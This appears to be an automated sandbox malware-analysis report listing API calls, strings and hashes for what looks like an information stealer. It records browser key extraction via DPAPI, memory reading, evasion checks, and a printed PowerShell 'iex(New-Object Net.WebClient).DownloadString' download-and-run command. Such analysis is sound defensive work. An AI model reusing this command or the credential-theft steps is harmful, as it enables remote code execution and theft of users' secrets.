                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                                  • String ID:
                                                  • API String ID: 634100517-0
                                                  • Opcode ID: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                                  • Instruction ID: 84b4572ca590114782b091576b9a89d8360325c6110713fe167f1eb626e4287d
                                                  • Opcode Fuzzy Hash: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                                  • Instruction Fuzzy Hash: 5801C431A817299BC722EB669C857DE77A0BF04794F01811BE81467390C72C69D2CBDD
                                                  APIs
                                                  • strlen.MSVCRT ref: 02F17186
                                                  • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,02F17401,00000000,00420BA8,00000000,00000000), ref: 02F171B4
                                                    • Part of subcall function 02F16E37: strlen.MSVCRT ref: 02F16E48
                                                    • Part of subcall function 02F16E37: strlen.MSVCRT ref: 02F16E6C
                                                  • VirtualQueryEx.KERNEL32(02F17574,00000000,?,0000001C), ref: 02F171F9
                                                  • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02F17401), ref: 02F1731A
                                                    • Part of subcall function 02F17047: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 02F1705F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strlen$MemoryProcessQueryReadVirtual
                                                  • String ID: @
                                                  • API String ID: 2950663791-2766056989
                                                  • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                  • Instruction ID: 590ab5b235b4abba308348fb8ea3ba37a74998ce7f171cb95ff28b2163545f04
                                                  • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                  • Instruction Fuzzy Hash: 48510AB1E04109EBDB08DF95D981AEFB7B5BF88340F108519FA19A7240D734EA01CBA5
                                                  APIs
                                                  • strlen.MSVCRT ref: 00416F1F
                                                  • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041719A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 00416F4D
                                                    • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416BE1
                                                    • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416C05
                                                  • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 00416F92
                                                  • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041719A), ref: 004170B3
                                                    • Part of subcall function 00416DE0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00416DF8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strlen$MemoryProcessQueryReadVirtual
                                                  • String ID: @
                                                  • API String ID: 2950663791-2766056989
                                                  • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                  • Instruction ID: da6ee04ed372484ea639f8c5ae6d2cf8ded6d6947598eb42fecba3fc0a9bdd2e
                                                  • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                  • Instruction Fuzzy Hash: 27511CB5E041099BDB04CF98D981AEFBBB5FF88304F108559F919A7340D738EA51CBA5
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E2A), ref: 00406A19
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID: *n@$*n@
                                                  • API String ID: 1029625771-193229609
                                                  • Opcode ID: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                                  • Instruction ID: a280f62563b1b8af23ece619f3fba2aedbd92eaccb2561d1aa32790852693925
                                                  • Opcode Fuzzy Hash: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                                  • Instruction Fuzzy Hash: DA71C874A00119DFCB04CF48C484BEAB7B2FB88315F158179E80AAF391D739AA91CB95
                                                  APIs
                                                  • lstrcat.KERNEL32(?,0064A30C), ref: 02F14A42
                                                    • Part of subcall function 02F19047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02F19072
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F14A68
                                                  • lstrcat.KERNEL32(?,?), ref: 02F14A87
                                                  • lstrcat.KERNEL32(?,?), ref: 02F14A9B
                                                  • lstrcat.KERNEL32(?,0064A284), ref: 02F14AAE
                                                  • lstrcat.KERNEL32(?,?), ref: 02F14AC2
                                                  • lstrcat.KERNEL32(?,0064A2C8), ref: 02F14AD6
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                    • Part of subcall function 02F18FF7: GetFileAttributesA.KERNEL32(00000000,?,02F01DBB,?,?,0042565C,?,?,00420E1F), ref: 02F19006
                                                    • Part of subcall function 02F147D7: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 02F147E7
                                                    • Part of subcall function 02F147D7: RtlAllocateHeap.NTDLL(00000000), ref: 02F147EE
                                                    • Part of subcall function 02F147D7: wsprintfA.USER32 ref: 02F1480D
                                                    • Part of subcall function 02F147D7: FindFirstFileA.KERNEL32(?,?), ref: 02F14824
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                  • String ID:
                                                  • API String ID: 2540262943-0
                                                  • Opcode ID: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                                  • Instruction ID: fe26e56553362fcdd0827bd456bcc66cb43873b085b04aa8509c867a9439e324
                                                  • Opcode Fuzzy Hash: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                                  • Instruction Fuzzy Hash: BE3152B6A40218ABDB14FBF0DC84EED737AAB58740F8045C9B74596080EEB49789CF95
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00412D85
                                                  Strings
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412D04
                                                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412CC4
                                                  • <, xrefs: 00412D39
                                                  • ')", xrefs: 00412CB3
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  • API String ID: 3031569214-898575020
                                                  • Opcode ID: be724a604eb788cc69cb88ea5721ac6dea3b77e10dbfd579f56e69c65ca0a354
                                                  • Instruction ID: 8aa8f54ed0a99c91faffa02525c95fa844b6858a6ee3c68abfdd9097d7126834
                                                  • Opcode Fuzzy Hash: be724a604eb788cc69cb88ea5721ac6dea3b77e10dbfd579f56e69c65ca0a354
                                                  • Instruction Fuzzy Hash: 08410E71D112089ADB14FBA1C991FDDB774AF10314F50401EE016A7192DF786ADBCFA9
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 02F014A5
                                                  • __aulldiv.LIBCMT ref: 02F014BF
                                                  • __aulldiv.LIBCMT ref: 02F014CD
                                                  • ExitProcess.KERNEL32 ref: 02F014FB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                  • String ID: @
                                                  • API String ID: 3404098578-2766056989
                                                  • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                  • Instruction ID: 24695cecb5adce19e65b8ab280f36084ec39763365d126a31ea50eac34e85075
                                                  • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                  • Instruction Fuzzy Hash: AF016DB0D40308FAEF10DBD0CD89B9EBBB9AB01745F208448E7097B2C0D7B49541CB55
                                                  APIs
                                                  • memcmp.MSVCRT(?,00421264,00000003), ref: 02F0A094
                                                    • Part of subcall function 02F1AA07: lstrcpy.KERNEL32(?,00000000), ref: 02F1AA4D
                                                    • Part of subcall function 02F10CC7: memset.MSVCRT ref: 02F10E83
                                                    • Part of subcall function 02F10CC7: lstrcat.KERNEL32(?,00000000), ref: 02F10E9C
                                                    • Part of subcall function 02F10CC7: lstrcat.KERNEL32(?,00420D7C), ref: 02F10EAE
                                                    • Part of subcall function 02F10CC7: lstrcat.KERNEL32(?,00000000), ref: 02F10EC4
                                                    • Part of subcall function 02F10CC7: lstrcat.KERNEL32(?,00420D80), ref: 02F10ED6
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                  • memcmp.MSVCRT(?,00421114,00000003), ref: 02F0A116
                                                  • memset.MSVCRT ref: 02F0A14F
                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 02F0A1A8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                                  • String ID: @
                                                  • API String ID: 1977917189-2766056989
                                                  • Opcode ID: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                                  • Instruction ID: 39b13e8e67edf94d0a1295c51993cac6dd0ad7e54c47c29ad2f8f812f79ae62f
                                                  • Opcode Fuzzy Hash: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                                  • Instruction Fuzzy Hash: 29613B31A00248EBCB28EFA4CD95FED7776AF44744F808118EB0AAB5D0EB746A45CF51
                                                  APIs
                                                  • strtok_s.MSVCRT ref: 00410DB8
                                                  • strtok_s.MSVCRT ref: 00410EFD
                                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,02D45BB0,?,0042110C,?,00000000), ref: 0041A82B
                                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strtok_s$lstrcpylstrlen
                                                  • String ID:
                                                  • API String ID: 348468850-0
                                                  • Opcode ID: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                                                  • Instruction ID: a77fe6eef144f8be1650d890f93c6b8163d42d0b0f361fe6991083760d0b9acb
                                                  • Opcode Fuzzy Hash: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                                                  • Instruction Fuzzy Hash: 91517FB4A40209EFCB08CF95D595AEE77B5FF44308F10805AE802AB351D774EAD1CB95
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                    • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                    • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                    • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                    • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                    • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                    • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                                    • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                                    • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                                    • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                                    • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                                  • memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                                    • Part of subcall function 00409B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                                    • Part of subcall function 00409B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                                    • Part of subcall function 00409B60: memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                                    • Part of subcall function 00409B60: LocalFree.KERNEL32(?), ref: 00409BD3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
                                                  • String ID: $"encrypted_key":"$DPAPI
                                                  • API String ID: 3731072634-738592651
                                                  • Opcode ID: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                                                  • Instruction ID: 5ad523267ed72994677b79ea1d9dce7d7822fbf486e040e59600fa97cf483dfd
                                                  • Opcode Fuzzy Hash: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                                                  • Instruction Fuzzy Hash: D53155B5D10109ABCB04EBE4DC85AEF77B8BF44304F14452AE915B7282E7389E04CBA5
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CodeInfoPageValidmemset
                                                  • String ID:
                                                  • API String ID: 703783727-0
                                                  • Opcode ID: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                                  • Instruction ID: 4acae3c0ca24b7fc485e41f7ed0715f0c4eae3efeb5cce2e25da74cf24042232
                                                  • Opcode Fuzzy Hash: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                                  • Instruction Fuzzy Hash: 8D31F631E842919EDB268F75CC94379BFA09F06394B8881ABDA82CF192C368C405C763
                                                  APIs
                                                  • GetSystemTime.KERNEL32(?), ref: 02F16BD3
                                                  • sscanf.NTDLL ref: 02F16C00
                                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 02F16C19
                                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 02F16C27
                                                  • ExitProcess.KERNEL32 ref: 02F16C41
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Time$System$File$ExitProcesssscanf
                                                  • String ID:
                                                  • API String ID: 2533653975-0
                                                  • Opcode ID: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                                  • Instruction ID: d1d5fbeef4dcbd807cdd8e11e8ede4b7a768664693190800c8099744c312115b
                                                  • Opcode Fuzzy Hash: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                                  • Instruction Fuzzy Hash: BC21E7B5D04209ABCB08EFE4D9459EEB7BAFF48301F44852EE506E3250EB345604CB65
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 02F1809E
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 02F180A5
                                                  • RegOpenKeyExA.ADVAPI32(80000002,0064A1D4,00000000,00020119,?), ref: 02F180C5
                                                  • RegQueryValueExA.ADVAPI32(?,0064A4EC,00000000,00000000,000000FF,000000FF), ref: 02F180E6
                                                  • RegCloseKey.ADVAPI32(?), ref: 02F180F9
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                  • String ID:
                                                  • API String ID: 3225020163-0
                                                  • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                  • Instruction ID: 7fb30a3b94e4c00c74cbb48bf92a864cff030a43f8d0b2ac926a867ee9731bc0
                                                  • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                  • Instruction Fuzzy Hash: 91113DB6A84209BBE714DFD4DD4AFABBBB9EB05B50F104219F615A7280C77558008BA1
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417E37
                                                  • HeapAlloc.KERNEL32(00000000), ref: 00417E3E
                                                  • RegOpenKeyExA.ADVAPI32(80000002,02D42888,00000000,00020119,?), ref: 00417E5E
                                                  • RegQueryValueExA.ADVAPI32(?,02D49C10,00000000,00000000,000000FF,000000FF), ref: 00417E7F
                                                  • RegCloseKey.ADVAPI32(?), ref: 00417E92
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                  • String ID:
                                                  • API String ID: 3466090806-0
                                                  • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                  • Instruction ID: f35b37edc560d93cca1bbeb044924e1a71a0ba88b9c12cde0d27c4035fcf8d53
                                                  • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                  • Instruction Fuzzy Hash: 01114CB5A84205FFD710CFD4DD4AFBBBBB9EB09B10F10425AF605A7280D77858018BA6
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 02F1799B
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 02F179A2
                                                  • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,02F17920), ref: 02F179C2
                                                  • RegQueryValueExA.ADVAPI32(02F17920,00420AAC,00000000,00000000,?,000000FF), ref: 02F179E1
                                                  • RegCloseKey.ADVAPI32(02F17920), ref: 02F179EB
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                  • String ID:
                                                  • API String ID: 3225020163-0
                                                  • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                  • Instruction ID: 6d563ee23bd17f4bc91ab3c3c6c8fdd419ee71cb506ce7c207119c328b5510d8
                                                  • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                  • Instruction Fuzzy Hash: C301FFB9A80308BFEB10DFE4DD4AFAEB7B9EB48701F504559FA05A7280DB7596008F51
                                                  APIs
                                                  • StrStrA.SHLWAPI(02D493C8,?,?,?,0041140C,?,02D493C8,00000000), ref: 0041926C
                                                  • lstrcpyn.KERNEL32(0064AB88,02D493C8,02D493C8,?,0041140C,?,02D493C8), ref: 00419290
                                                  • lstrlenA.KERNEL32(?,?,0041140C,?,02D493C8), ref: 004192A7
                                                  • wsprintfA.USER32 ref: 004192C7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpynlstrlenwsprintf
                                                  • String ID: %s%s
                                                  • API String ID: 1206339513-3252725368
                                                  • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                                  • Instruction ID: a59194731e19cd62a1114d9db51b1d7a77f87ed08144ed5303bdb74f02b8d175
                                                  • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                                  • Instruction Fuzzy Hash: FD010879580108FFCB04DFECC998EAE7BBAEB49394F108548F9098B300C635AA40DB95
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 02F0151B
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 02F01522
                                                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 02F0153E
                                                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 02F0155C
                                                  • RegCloseKey.ADVAPI32(?), ref: 02F01566
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                  • String ID:
                                                  • API String ID: 3225020163-0
                                                  • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                  • Instruction ID: 179fe7dece98cc7c08ab46860e9156f284b8c1e3622b5a3dd571e494f8bb15dd
                                                  • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                  • Instruction Fuzzy Hash: ED01CDBDA40208BFDB14DFE4DC49FAEB7B9EB48705F108159FA0597280D6759A018F91
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                                  • HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
